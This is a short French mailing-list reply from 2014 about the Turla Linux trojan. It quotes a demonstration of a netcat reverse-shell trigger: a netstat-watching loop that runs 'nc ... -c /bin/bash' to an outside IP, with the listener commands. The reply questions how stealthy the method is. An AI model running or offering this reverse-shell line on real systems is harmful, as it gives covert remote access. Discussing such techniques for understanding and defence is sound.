[gull] Trojan Turla for Linux

Daniel Cordey dc at mjt.ch
Wed Dec 17 15:45:05 CET 2014

On mer, 2014-12-17 at 12:09 +0100, felix wrote:

> Sans chercher à affoler tous le monde...

Faut quand meme reunir quelques conditions... non ? Ou bien j'ai loupe
quelque chose ? Ce qui peut parfaitement ariver :-)

>   $ while :;do netstat -n | grep -q $myfixedip:22 &&
>         nc $myfixedip 80 -c /bin/bash ; done

Et bibi n'ayant pas de port 22...

>   dans une console:
>   $ nc -l -p 80

Ouai, je listen...

>   et dans une autre:
>   $ nc -w 3 $targethost 22

Et pourquoi ce timeout ?

>  - il n'a pas de port ouvert en listen.

Oui, mais une connexion est etablie en TCP en sortie... non ? je peux
donc la voir avec netstat... toujours non ?

>  - la connexion se faisant de l'intérieur vers un port 80 à l'extérieur,
>    elle passera pour une simple connection ``surf''.

Sur une machine qui n'a pas de browser... ca parait vite douteux... il
me semble

non, non, non ? :-)

Merci Felix.